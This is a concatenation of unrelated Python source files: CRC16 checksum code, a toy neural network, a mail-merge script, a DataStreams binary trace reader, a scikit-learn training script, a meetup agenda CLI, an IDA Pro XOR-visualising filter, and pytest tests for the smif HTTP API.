0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0
]
def crc16_ccitt(data, crc=0):
"""Calculate the crc16 ccitt checksum of some data
A starting crc value may be specified if desired. The input data
is expected to be a sequence of bytes (string) and the output
is an integer in the range (0, 0xFFFF). No packing is done to the
resultant crc value. To check the value a checksum, just pass in
the data byes and checksum value. If the data matches the checksum,
then the resultant checksum from this function should be 0.
"""
tab = CRC16_CCITT_TAB # minor optimization (now in loacls)
for byte in data:
crc = (((crc << 8) & 0xff00) ^ tab[((crc >> 8) & 0xff) ^ ord(byte)])
return crc & 0xffff
def _calculate_crc16ccitt(payload, seed=0):
crc = seed
for c in payload:
tmp_crc = crc
crc = ((tmp_crc >> 8)&0xFF) | (tmp_crc << 8)
crc ^= ord(c)
crc ^= (crc & 0xff) >> 4
crc ^= (crc << 8) << 4
crc ^= ((crc & 0xff) << 4) << 1
crc &= 0xFFFF
return chr(crc&0xff)+chr((crc&0xff00)>>8)
print ' '.join('%02X' % ord(x) for x in _calculate_crc16ccitt('hello world')) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 9 17:39:29 2020
@author: MenesesGHZ
"""
import numpy as np
import json
class ANN:
def __init__(self,input_size=784,output_size=10):
self.weights = np.ones(shape=(output_size,input_size))
self.output = np.zeros(shape=(output_size))
self.alpha = 0.01
def predict(self,x):
"""
FORWARD PROPAGATION
"""
def w_sum(x,weights):
sum_x_w = float()
for i in range(len(x)):
sum_x_w += x[i] * weights[i]
return sum_x_w
for i in range(len(self.output)):
self.output[i]=w_sum(x,self.weights[i])
return self.output
def train(self,data_x,data_y,prediction):
"""
REDUCING THE ERROR
"""
delta = prediction - data_y
weights_delta = np.zeros(shape=self.weights.shape)
for i in range(len(weights_delta)):
for j in range(len(weights_delta[i])):
weights_delta[i][j] = delta[i]*data_x[j]
self.weights = self.weights - weights_delta * self.alpha
def save_weights(self,filename):
with open(filename+".json","w") as file:
json_instance = json.dumps(self.weights.tolist())
file.write(json_instance)
def load_weights(self,filename):
with open(filename+'.json', 'r') as file:
self.weights = np.array(json.load(file)) |
sl_file = "./Input/Letters/starting_letter.txt"
il_file = "./Input/Names/invited_names.txt"
PLACEHOLDER = "[name]"
with open(il_file, 'r') as il:
invited_names_list = il.readlines()
with open(sl_file, 'r') as sl:
starting_letter = sl.read()
for name in invited_names_list:
stripped_name = name.strip()
new_letter = starting_letter.replace(PLACEHOLDER, stripped_name)
with open(f"./Output/ReadyToSend/letter_for_{stripped_name}.txt", mode='w') as complete_letter:
complete_letter.write(new_letter)
|
import flowio
import numpy
f = flowio.FlowData('001_F6901PRY_21_C1_C01.fcs')
n = numpy.reshape(f.events, (-1, f.channel_count))
|
import entities
from datastreams import namespaces
#from datastreams import dsui
import struct
import event_data
import cPickle
from ppexcept import *
import os
from select import poll, POLLIN
import time
magic_format = "I"
magic_size = struct.calcsize(magic_format)
rawmagic = 0x1abcdef1
raw2magic = 0x2abcdef2
picklemagic = 0xdeadbeef
xmlmagic = struct.unpack(magic_format, struct.pack("=4s","<!--"))
class InputSource:
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
def get_dependency(self):
return None
def open(self):
raise Exception("abstract")
def read(self):
raise Exception("abstract")
def close(self):
raise Exception("abstract")
def seek(self, num):
raise InputSourceException("Input source does not support seeking")
def get_progress(self):
return 0.0
def determine_file_type(filename):
f = open(filename, "rb")
bin = f.read(magic_size);
f.close()
magic = struct.unpack(magic_format, bin)[0]
if magic == rawmagic:
return "raw"
if magic == raw2magic:
return "raw2"
elif magic == picklemagic:
return "pickle"
elif magic == xmlmagic:
return "xml"
else:
raise PostprocessException("Unable to determine file type of file "+filename)
class RawInputSource(InputSource):
"""reads raw binary files written by DSKI/DSUI. hackish but works."""
def __init__(self, filename, local_edf_modules, infile=None, endless=False):
InputSource.__init__(self, filename)
self.local_ns = namespaces.get_admin_ns()
self.ns_event = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE"].get_id()
self.histevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_HISTOGRAM"].get_id()
self.counterevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_COUNTER"].get_id()
self.intervalevent = self.local_ns["DSTREAM_ADMIN_FAM/EVENT_INTERVAL"].get_id()
self.ns_frag_event = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE_FRAGMENT"].get_id()
self.chunkevent = self.local_ns["DSTREAM_ADMIN_FAM/DATA_CHUNK"].get_id()
self.formats = {
"event" : "QIIIIi",
}
self.sizes = {}
for k, v in self.formats.iteritems():
self.sizes[k] = struct.calcsize(v)
self.filename = filename
self.decoder = event_data.ExtraDataDecoder(local_edf_modules)
self.header = None
self.infile = infile
self.position = 0
self.totalsize = None
self.waiting_chunks = []
self.endless = endless
def get_progress(self):
if self.totalsize:
return (float(self.position) / float(self.totalsize)) * 100
else:
return 0.0
def declare_entity(self, fname, ename, desc, edf, etype, aid):
ns = namespaces.Namespace()
eid = 0
if etype == namespaces.EVENTTYPE:
espec = namespaces.EventSpec(fname, ename, desc, edf, aid)
elif etype == namespaces.COUNTERTYPE:
espec = namespaces.CounterSpec(fname, ename, desc, aid)
elif etype == namespaces.INTERVALTYPE:
espec = namespaces.IntervalSpec(fname, ename, desc, aid)
elif etype == namespaces.HISTOGRAMTYPE:
espec = namespaces.HistogramSpec(fname, ename, desc, edf, aid)
ns.add_entity(espec)
# merge this created namespace (that just defines one entity)
# with our local namespace, which will give us proper id numbers
# for family and entity
conf, new_ns = self.local_ns.merge(ns)
return new_ns
def read(self):
retval = entities.PipelineEnd()
try:
retval = self.__read()
except PostprocessException, e:
print self.name, "file corruption: ", e
return retval
def __read(self):
#The name of the machine the data was collected on
machine = self.header["hostname"]
#dsui.event("INPUTS","RAW_INPUT_READ");
while True:
for evt in self.waiting_chunks:
cid = evt.get_cid()
seq = evt.get_sequence()
if self.decoder.has_cached_data(cid, seq):
self.waiting_chunks.remove(evt)
evt.extra_data = self.decoder.get_cached_data(cid, seq)
return evt
event_binary = self.infile_read(self.sizes["event"])
if len(event_binary) < self.sizes["event"]:
# end of stream reached
if self.endless:
# XXX hack for online postprocessing
continue
else:
return entities.PipelineEnd()
event_record = struct.unpack(self.formats["event"],
event_binary)
tsc, seq, aid, tag, pid, datalen = event_record
#print "decoded record", event_record, cid_to_ids(aid)
try:
cid = long(aid)
event_spec = self.local_ns[cid]
except KeyError:
print self.local_ns.to_configfile()
print self.local_ns.keys()
raise InputSourceException("Unknown composite id "+
`cid`)
timeval = {
"tsc" : entities.TimeMeasurement("tsc", tsc,
machine, 0, 0),
"sequence" : entities.TimeMeasurement("sequence",
seq, self.filename, 0, 0)
}
edf_name = event_spec.get_edf()
wait_flag = False
if datalen > 0:
extra_data_binary = self.infile_read(datalen)
elif edf_name and self.decoder.has_cached_data(cid, seq):
extra_data_binary = self.decoder.get_cached_data(cid, seq)
elif edf_name:
extra_data_binary = None
if datalen == -1:
wait_flag = True
if cid == self.chunkevent:
self.decoder.decode_chunk(extra_data_binary)
continue
if edf_name and (extra_data_binary != None):
try:
extra_data = self.decoder.decode(edf_name,
extra_data_binary)
except Exception, ex:
print "Failed to decode extra data for",self.local_ns[cid]
raise
else:
extra_data = None
if cid == self.counterevent:
entity = entities.Counter(
extra_data["raw_cid"],
timeval,
extra_data["count"],
entities.get_tsc_measurement(
extra_data["first_update"],
machine),
entities.get_tsc_measurement(
extra_data["last_update"],
machine), pid)
elif cid == self.histevent:
entity = entities.Histogram(
extra_data["raw_cid"],
timeval,
extra_data["lowerbound"], extra_data["upperbound"],
extra_data["num_buckets"], pid)
entity.populate(extra_data["underflow"],
extra_data["overflow"],
extra_data["sum"],
extra_data["num_events"],
extra_data["min_seen"],
extra_data["max_seen"],
extra_data["buckets"])
elif cid == self.intervalevent:
starttime = {
"tsc" : entities.TimeMeasurement("tsc",
extra_data["start_time"], machine, 0, 0),
}
entity = entities.Interval(
extra_data["raw_cid"],
starttime, timeval, tag, pid);
else: # event
if cid == self.ns_frag_event:
ns_frag = self.declare_entity(
extra_data["family_name"],
extra_data["entity_name"],
extra_data["desc"],
extra_data["edf"],
extra_data["type"],
long(extra_data["aid"]))
return entities.Event(self.ns_event, timeval, tag, ns_frag, pid)
elif cid == self.ns_event:
raise Exception ("your input file is too old")
c, new_ns = self.local_ns.merge(extra_data)
for z in new_ns.values():
self.aid_index[z.get_id()] = z.get_id()
for old_cid, new_cid in c.items():
self.aid_index[old_cid] = new_cid
entity = entities.Event(cid, timeval, tag, extra_data, pid)
entity.namespace = self.local_ns
if wait_flag:
self.waiting_chunks.append(entity)
continue
return entity
def open(self):
if not self.infile:
self.totalsize = os.stat(self.filename).st_size
self.infile = open(self.filename, "rb")
self.read_binary_header()
def infile_read(self, size):
self.position = self.infile.tell()
return self.infile.read(size)
def read_binary_header(self):
fmt = "IIIIII80s"
header_binary = self.infile_read(struct.calcsize(fmt))
h = struct.unpack(fmt, header_binary);
self.header = {
"sz_int" : h[1],
"sz_long" : h[2],
"sz_short" : h[3],
"sz_long_long" : h[4],
"sz_ptr" : h[5],
"hostname" : h[6].strip('\x00'),
}
def close(self):
if self.waiting_chunks:
print self.filename,"ERROR",(len(self.waiting_chunks)),"events were held back due to missing/incomplete extra data"
for e in self.waiting_chunks:
print e
self.infile.close()
pass
# used to generate unique names for socket input sources, since there
# will be multiple ones for SMP hosts
socket_dictionary = {}
class SocketRawInputSource(RawInputSource):
def __init__(self, host, port, local_edf):
if host not in socket_dictionary:
socket_dictionary[host] = 0
else:
socket_dictionary[host] = socket_dictionary[host] + 1
id = socket_dictionary[host]
RawInputSource.__init__(self, `host`+"-"+`id`, local_edf)
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def open(self):
print "Connecting to",self.host,self.port
self.sock.connect((self.host, self.port))
print "Connected"
self.infile = self.sock.makefile('r')
read_binary_header()
def __del__(self):
self.close()
def close(self):
self.infile.close()
self.sock.close()
from datastreams import dski
class OnlineRawInputSource(RawInputSource):
def open(self):
if not self.infile:
self.totalsize = os.stat(self.filename).st_size
self.infile = open(self.filename, "rb")
self.pollobj = poll()
self.pollobj.register(self.infile.fileno(), POLLIN)
ctx = dski.dski_context(None)
self.local_ns.merge(ctx.ns)
ctx.close()
self.header = {}
self.header["hostname"] = "localhost"
self.ns_sent = False
def read(self):
if not self.ns_sent:
self.ns_sent = True
return entities.Event(self.ns_event,
entities.get_zero_timedict(),
2337, self.local_ns)
return RawInputSource.read(self)
def infile_read(self, size):
ret = self.infile.read(size)
if not ret:
v = self.pollobj.poll(1000)
return self.infile.read(size)
else:
return ret
class PickleInputSource(InputSource):
"""reads 'cooked' binary files written by postprocess2"""
def __init__(self, filename):
InputSource.__init__(self, filename)
self.filename = filename
def read(self):
e = self.unpickler.load()
return e
def open(self):
self.infile = open(self.filename, "rb")
# skip the magic number
self.infile.read(magic_size)
self.unpickler = cPickle.Unpickler(self.infile)
pass
def close(self):
self.infile.close()
pass
class XMLInputSource(InputSource):
def __init__(self, filename):
InputSource.__init__(self, filename)
self.filename = filename
raise Exception("XML input unimplemented")
def open(self):
pass
def close(self):
pass
def read(self):
pass
class PipelineInputSource(InputSource):
def __init__(self, pipename, outputname, queue_param, pipe_index, our_pipe):
n = pipename+"/"+outputname+"->"+our_pipe.get_name()
InputSource.__init__(self, n)
self.other_pipe_name = pipename
self.output_name = outputname
self.pipe = our_pipe
self.node = our_pipe.get_node()
self.input_queue = None
self.queue_param = queue_param
self.pipe_index = pipe_index
self.deps = None
def get_dependency(self):
return self.deps
def read(self):
e = self.input_queue.get()
return e
def close(self):
pass
def open(self):
if self.node.has_pipeline(self.other_pipe_name):
p = self.node.get_pipeline(self.other_pipe_name)
self.input_queue = p.connect(self.get_name(),
self.output_name,
self.queue_param, self.pipe_index)
self.deps = self.other_pipe_name
return
# do CORBA magic....
pass
def ns_id_generator():
v = 1
while True:
yield v
v = v + 1
ns_id_gen = ns_id_generator()
class NamespaceInputSource(InputSource):
"""Used to inject user-supplied namespaces"""
def __init__(self, ns):
InputSource.__init__(self, "ns"+`ns_id_gen.next()`)
self.local_ns = namespaces.get_admin_ns()
self.nsevent = self.local_ns["DSTREAM_ADMIN_FAM/NAMESPACE"].get_id()
if type(ns) is str or type(ns) is list:
self.ns = namespaces.read_namespace_files(ns)
else:
v = namespaces.verify_namespace_config(ns)
self.ns = namespaces.construct_namespace(v)
def open(self):
pass
def close(self):
pass
def read(self):
if not self.ns:
return entities.PipelineEnd()
e = entities.Event(self.nsevent, entities.get_zero_timedict(),
0, self.ns)
self.ns = None
return e
|
import argparse
import pandas as pd
from sklearn.preprocessing import StandardScaler, OrdinalEncoder
from sklearn.compose import ColumnTransformer
from sklearn.linear_model import LogisticRegression
from joblib import dump
import yaml
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S')
def read_data(name):
path = './data/'
df = pd.read_csv(path + name + '_processed.csv')
df = df[df['result'] != 99]
return df
def read_yaml():
with open('./model/model.yaml') as y:
desc = yaml.load(y, Loader=yaml.FullLoader)
return desc
def transform_data(data, yaml):
df = data.copy()
X = df.drop(columns='result')
y = df['result']
pipeline = ColumnTransformer([
('numerical_transformations', StandardScaler(), yaml['numerical_features']),
('categorical_transformations', OrdinalEncoder(), yaml['categorical_features'])
])
pipeline.fit(X)
X = pipeline.transform(X)
dump(pipeline, f'./model/{yaml["model_name"]}_transformer.joblib')
yaml['transformer'] = f'{yaml["model_name"]}_transformer.joblib'
return X, y
def train_model(X, y, yaml):
model = LogisticRegression(random_state=0, **yaml['hiperparameters'])
model.fit(X,y)
dump(model, f'./model/{yaml["model_name"]}.joblib')
return model.score(X,y)
if __name__ == '__main__':
logging.info('Reading arguments')
parser = argparse.ArgumentParser(description='Script for training score model.')
parser.add_argument('data_name', type=str)
args = parser.parse_args()
name = args.data_name
logging.info('Reading data')
x = read_data(name)
logging.info('Reading YAML file')
config = read_yaml()
logging.info('Transforming data')
X, y = transform_data(x, config)
logging.info('Data transformed')
logging.info(f'Transformed saved as {config["model_name"]}_transformer.joblib')
logging.info('Model training')
score = train_model(X, y, config)
logging.info(f'Model accuracy: {score*100:.2f}%')
logging.info(f'Model saved as {config["model_name"]}.joblib')
|
import json
import click
import requests
import re
import arrow
def read_json(path):
with open(path) as f:
json_dict = json.load(f)
return json_dict
def write_json(path, _dict):
with open(path, "w") as f:
f.write(json.dumps(_dict))
class Issue:
def __init__(self, _id):
url = "https://api.github.com/repos/EtherTW/talks/issues/{0}".format(
_id)
self.issue_url = "https://github.com/EtherTW/talks/issues/{0}".format(_id)
self.content = requests.get(url).json()
self.title = self.content["title"]
self.body = self.content["body"]
for chunk in self.body.split("### ")[1:]:
if chunk.startswith('Abstract'):
self.abstract = chunk.split('\n', 1)[1].rstrip()
elif chunk.startswith('Language'):
self.language = self.extract_language(chunk)
self.speaker = self.content['user']['login']
self.time = 40 # minutes #TODO: get this info from issue
@staticmethod
def extract_language(string):
regex = r"- \[x\] (.*)\n"
matches = re.finditer(regex, string)
return next(matches).group(1)
def talk_info(self):
return "{title}\n\nby {speaker}\n\n{abstract}\n\nLanguage: {language}\n\n{issue_url}".format(**self.__dict__)
class Event:
def __init__(self, path):
self.content = read_json(path)
self.event_id = self.content["event"].split("/")[-1]
self.issues = [Issue(_id=talk["issue"])
for talk in self.content["talks"]]
def show_event(self):
agenda = Agenda(start=arrow.utcnow().replace(
hour=19, minute=0, second=0))
agenda.add_item("Networking", 30)
for issue in self.issues:
print(issue.talk_info())
agenda.add_item(issue.title, issue.time)
agenda.add_item("Break", 10)
print("\n\n")
print("\n\n")
print(agenda.show_agenda())
class Agenda:
def __init__(self, start):
self.agenda = []
self.start = start
def add_item(self, title, minutes):
self.agenda.append([title, minutes])
def show_agenda(self):
output = "Agenda\n\n"
current_time = self.start
for title, minutes in self.agenda:
moments_later = current_time.shift(minutes=+ minutes)
output += "{0} - {1}\t {2}\n".format(
current_time.format("HH:mm"), moments_later.format("HH:mm"), title)
current_time = moments_later
return output
class MeetupAPI:
def __init__(self):
# Get one from https://secure.meetup.com/meetup_api/key/
with open('.api_key', 'r') as f:
self.key = f.readlines()[0]
self.host = "api.meetup.com"
self.urlname = "Taipei-Ethereum-Meetup"
def get_event_info(self, event_id):
url = "https://{0}/{1}/events/{2}".format(
self.host, self.urlname, event_id)
response = requests.get(url, params={"sign": "true"})
return response.json()
@click.group()
def cli():
pass
@cli.command()
@click.argument('path')
def show(path):
event = Event(path)
print(event.show_event())
@cli.command()
@click.argument('title')
def new(title):
default = {
"event": "",
"talks": []
}
write_json("./meetups/{0}.json".format(title), default)
click.echo("Create a new meetup at {0}".format(title))
if __name__ == '__main__':
cli()
|
from PyQt5.QtGui import qRgb
from idacyber import ColorFilter
from ida_kernwin import msg
from collections import Counter
class AutoXor(ColorFilter):
name = "AutoXOR"
def __init__(self):
self.key = 0x80
self.occurence = 0
self.size = 0
def _update_key(self, buffers):
if buffers:
tmp = ''
for mapped, buf in buffers:
tmp += buf if mapped else ''
self.size = len(tmp)
c = Counter(tmp.replace("\x00",""))
mc = c.most_common(1)
if len(mc):
cur, self.occurence = mc[0]
cur = ord(cur)
if cur != self.key:
msg('Key %02Xh - %d/%d (%.2f%%)\n' % (cur, self.occurence, self.size, float(self.occurence)/float(self.size)*100.0))
self.key = cur
def on_process_buffer(self, buffers, addr, size, mouse_offs):
colors = []
self._update_key(buffers)
for mapped, buf in buffers:
if mapped:
for c in buf:
c = (ord(c) ^ self.key) & 0xFF
colors.append((True, qRgb(c, 0, c)))
else:
for i in xrange(len(buf)):
colors.append((False, None))
return colors
def on_get_tooltip(self, addr, size, mouse_offs):
result = None
if self.size:
result = "Key %02Xh - %d/%d (%.2f%%)" % (self.key, self.occurence, self.size, float(self.occurence)/float(self.size)*100.0)
return result
def FILTER_INIT(pw):
return AutoXor()
def FILTER_EXIT():
return |
"""Test HTTP API application
"""
import datetime
import json
import os
from unittest.mock import Mock
import pytest
import smif
from flask import current_app
from smif.data_layer.store import Store
from smif.exception import SmifDataNotFoundError
from smif.http_api import create_app
@pytest.fixture
def mock_scheduler():
def get_status(arg):
if arg == "model_never_started":
return {"status": "unstarted"}
elif arg == "model_started_and_running":
return {
"status": "running",
}
elif arg == "model_started_and_done":
return {
"status": "done",
}
elif arg in ("unique_model_run_name"):
return {
"status": "running",
}
attrs = {"get_status.side_effect": get_status}
return Mock(**attrs)
@pytest.fixture
def mock_data_interface(
model_run,
get_sos_model,
get_sector_model,
get_scenario,
get_narrative,
get_dimension,
):
def read_model_run(arg):
_check_exist("model_run", arg)
return model_run
def read_sos_model(arg):
_check_exist("sos_model", arg)
return get_sos_model
def read_model(arg, skip_coords=False):
_check_exist("sector_model", arg)
return get_sector_model
def read_scenario(arg, skip_coords=False):
_check_exist("scenario", arg)
return get_scenario
def read_dimension(arg, skip_coords=False):
_check_exist("dimension", arg)
return get_dimension
def _check_exist(config, name):
if name == "does_not_exist":
raise SmifDataNotFoundError("%s '%s' not found" % (config, name))
attrs = {
"read_model_runs.side_effect": [[model_run]],
"read_model_run.side_effect": read_model_run,
"read_sos_models.side_effect": [[get_sos_model]],
"read_sos_model.side_effect": read_sos_model,
"read_models.side_effect": [[get_sector_model]],
"read_model.side_effect": read_model,
"read_scenarios.side_effect": [[get_scenario]],
"read_scenario.side_effect": read_scenario,
"read_dimensions.side_effect": [[get_dimension]],
"read_dimension.side_effect": read_dimension,
}
return Mock(spec=Store, **attrs)
@pytest.fixture
def app(request, mock_scheduler, mock_data_interface):
"""Return an app"""
test_app = create_app(
static_folder=os.path.join(os.path.dirname(__file__), "..", "fixtures", "http"),
template_folder=os.path.join(
os.path.dirname(__file__), "..", "fixtures", "http"
),
data_interface=mock_data_interface,
scheduler=mock_scheduler,
)
with test_app.app_context():
yield test_app
@pytest.fixture
def app_fail(request, mock_scheduler, mock_data_interface):
"""Return an app which will fail to find templates"""
test_app = create_app(
static_folder=os.path.join(os.path.dirname(__file__), "..", "fixtures", "404"),
template_folder=os.path.join(
os.path.dirname(__file__), "..", "fixtures", "404"
),
data_interface=mock_data_interface,
scheduler=mock_scheduler,
)
with test_app.app_context():
yield test_app
@pytest.fixture
def client(request, app):
"""Return an API client"""
test_client = app.test_client()
def teardown():
pass
request.addfinalizer(teardown)
return test_client
@pytest.fixture
def client_fail(request, app_fail):
"""Return an API client which will fail on request for home page"""
test_client = app_fail.test_client()
def teardown():
pass
request.addfinalizer(teardown)
return test_client
def parse_json(response):
"""Parse response data"""
return json.loads(response.data.decode("utf-8"))
def serialise_json(data):
return json.dumps(data, default=timestamp_serialiser)
def timestamp_serialiser(obj):
"""Serialist datetime"""
if isinstance(obj, datetime.datetime):
return obj.isoformat()
def test_hello(client):
"""Start with a welcome message"""
response = client.get("/")
assert "Welcome to smif" in str(response.data)
def test_template_not_found(client_fail):
"""Clear error if template not found"""
response = client_fail.get("/")
assert "Error: smif app template not found" in str(response.data)
def test_get_smif(client):
"""GET smif details"""
response = client.get("/api/v1/smif/")
data = parse_json(response)
assert data["data"]["version"] == smif.__version__
def test_get_smif_version(client):
"""GET smif version"""
response = client.get("/api/v1/smif/version")
data = parse_json(response)
assert data["data"] == smif.__version__
def test_model_runs(client, model_run):
"""GET all model runs"""
response = client.get("/api/v1/model_runs/")
assert current_app.config.data_interface.read_model_runs.call_count == 1
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [model_run]
def test_model_runs_filtered_running(client, model_run):
"""GET all model runs"""
response = client.get("/api/v1/model_runs/?status=running")
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [model_run]
def test_model_run(client, model_run):
"""GET single model run"""
name = model_run["name"]
response = client.get("/api/v1/model_runs/{}".format(name))
current_app.config.data_interface.read_model_run.assert_called_with(name)
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == model_run
def test_model_run_missing(client):
"""GET missing system-of-systems model run"""
response = client.get("/api/v1/model_runs/does_not_exist")
data = parse_json(response)
assert data["error"]["SmifDataNotFoundError"] == [
"model_run 'does_not_exist' not found"
]
def test_post_model_run(client, model_run):
"""POST model run"""
name = "test_post_model_run"
model_run["name"] = name
send = serialise_json(model_run)
response = client.post(
"/api/v1/model_runs/", data=send, content_type="application/json"
)
current_app.config.data_interface.write_model_run.assert_called_with(model_run)
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_put_model_run(client, model_run):
"""PUT model run"""
send = serialise_json(model_run)
response = client.put(
"/api/v1/model_runs/" + model_run["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.update_model_run.assert_called_with(
model_run["name"], model_run
)
assert response.status_code == 200
def test_delete_model_run(client, model_run):
"""DELETE model_run"""
send = serialise_json(model_run)
response = client.delete(
"/api/v1/model_runs/" + model_run["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.delete_model_run.assert_called_with(
model_run["name"]
)
assert response.status_code == 200
def test_start_model_run(client):
"""POST model run START"""
# Start a model_run
send = serialise_json(
{"args": {"verbosity": 0, "warm_start": False, "output_format": "local_csv"}}
)
response = client.post(
"/api/v1/model_runs/20170918_energy_water/start",
data=send,
content_type="application/json",
)
call = current_app.config.scheduler.add.call_args
assert call[0][0] == "20170918_energy_water"
assert call[0][1]["verbosity"] == 0
assert call[0][1]["warm_start"] is False
assert call[0][1]["output_format"] == "local_csv"
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_kill_model_run(client):
"""POST model run START"""
# Kill a model_run
response = client.post(
"/api/v1/model_runs/20170918_energy_water/kill",
data={},
content_type="application/json",
)
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
current_app.config.scheduler.kill.assert_called_with("20170918_energy_water")
def test_get_modelrun_status_modelrun_never_started(client):
"""GET model run STATUS"""
# Check if the modelrun is running
response = client.get("/api/v1/model_runs/model_never_started/status")
data = parse_json(response)
assert response.status_code == 200
assert data["data"]["status"] == "unstarted"
def test_get_modelrun_status_modelrun_running(client):
"""GET model run STATUS"""
# Check if the modelrun is running
response = client.get("/api/v1/model_runs/model_started_and_running/status")
data = parse_json(response)
assert response.status_code == 200
assert data["data"]["status"] == "running"
def test_get_modelrun_status_modelrun_done(client):
"""GET model run STATUS"""
# Check if the modelrun was successful
response = client.get("/api/v1/model_runs/model_started_and_done/status")
data = parse_json(response)
assert response.status_code == 200
assert data["data"]["status"] == "done"
def test_get_sos_models(client, get_sos_model):
"""GET all system-of-systems models"""
response = client.get("/api/v1/sos_models/")
assert current_app.config.data_interface.read_sos_models.called == 1
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [get_sos_model]
def test_get_sos_model(client, get_sos_model):
"""GET single system-of-systems model"""
name = get_sos_model["name"]
response = client.get("/api/v1/sos_models/{}".format(name))
current_app.config.data_interface.read_sos_model.assert_called_with(name)
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == get_sos_model
def test_get_sos_model_missing(client):
"""GET missing system-of-systems model"""
response = client.get("/api/v1/sos_models/does_not_exist")
data = parse_json(response)
assert data["error"]["SmifDataNotFoundError"] == [
"sos_model 'does_not_exist' not found"
]
def test_post_sos_model(client, get_sos_model):
"""POST system-of-systems model"""
name = "test_post_sos_model"
get_sos_model["name"] = name
send = serialise_json(get_sos_model)
response = client.post(
"/api/v1/sos_models/", data=send, content_type="application/json"
)
assert current_app.config.data_interface.write_sos_model.called == 1
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_put_sos_model(client, get_sos_model):
"""PUT sos_model"""
send = serialise_json(get_sos_model)
response = client.put(
"/api/v1/sos_models/" + get_sos_model["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.update_sos_model.assert_called_with(
get_sos_model["name"], get_sos_model
)
assert response.status_code == 200
def test_delete_sos_model(client, get_sos_model):
"""DELETE sos_model"""
send = serialise_json(get_sos_model)
response = client.delete(
"/api/v1/sos_models/" + get_sos_model["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.delete_sos_model.assert_called_with(
get_sos_model["name"]
)
assert response.status_code == 200
def test_get_sector_models(client, get_sector_model):
"""GET all model runs"""
response = client.get("/api/v1/sector_models/")
assert current_app.config.data_interface.read_models.called == 1
assert response.status_code == 200
data = parse_json(response)
assert data["data"] == [get_sector_model]
def test_get_sector_model(client, get_sector_model):
"""GET single model run"""
name = get_sector_model["name"]
response = client.get("/api/v1/sector_models/{}".format(name))
current_app.config.data_interface.read_model.assert_called_with(
name, skip_coords=True
)
data = parse_json(response)
assert data["data"] == get_sector_model
def test_get_sector_model_missing(client):
"""GET missing model run"""
response = client.get("/api/v1/sector_models/does_not_exist")
data = parse_json(response)
assert data["error"]["SmifDataNotFoundError"] == [
"sector_model 'does_not_exist' not found"
]
def test_post_sector_model(client, get_sector_model):
"""POST sector model"""
name = "test_post_sector_model"
get_sector_model["name"] = name
send = serialise_json(get_sector_model)
response = client.post(
"/api/v1/sector_models/", data=send, content_type="application/json"
)
current_app.config.data_interface.write_model.assert_called_with(get_sector_model)
data = parse_json(response)
assert response.status_code == 201
assert data["message"] == "success"
def test_put_sector_model(client, get_sector_model):
"""PUT sector_model"""
send = serialise_json(get_sector_model)
response = client.put(
"/api/v1/sector_models/" + get_sector_model["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.update_model.assert_called_with(
get_sector_model["name"], get_sector_model
)
assert response.status_code == 200
def test_delete_sector_model(client, get_sector_model):
"""DELETE sector_model"""
send = serialise_json(get_sector_model)
response = client.delete(
"/api/v1/sector_models/" + get_sector_model["name"],
data=send,
content_type="application/json",
)
current_app.config.data_interface.delete_model.assert_called_with(
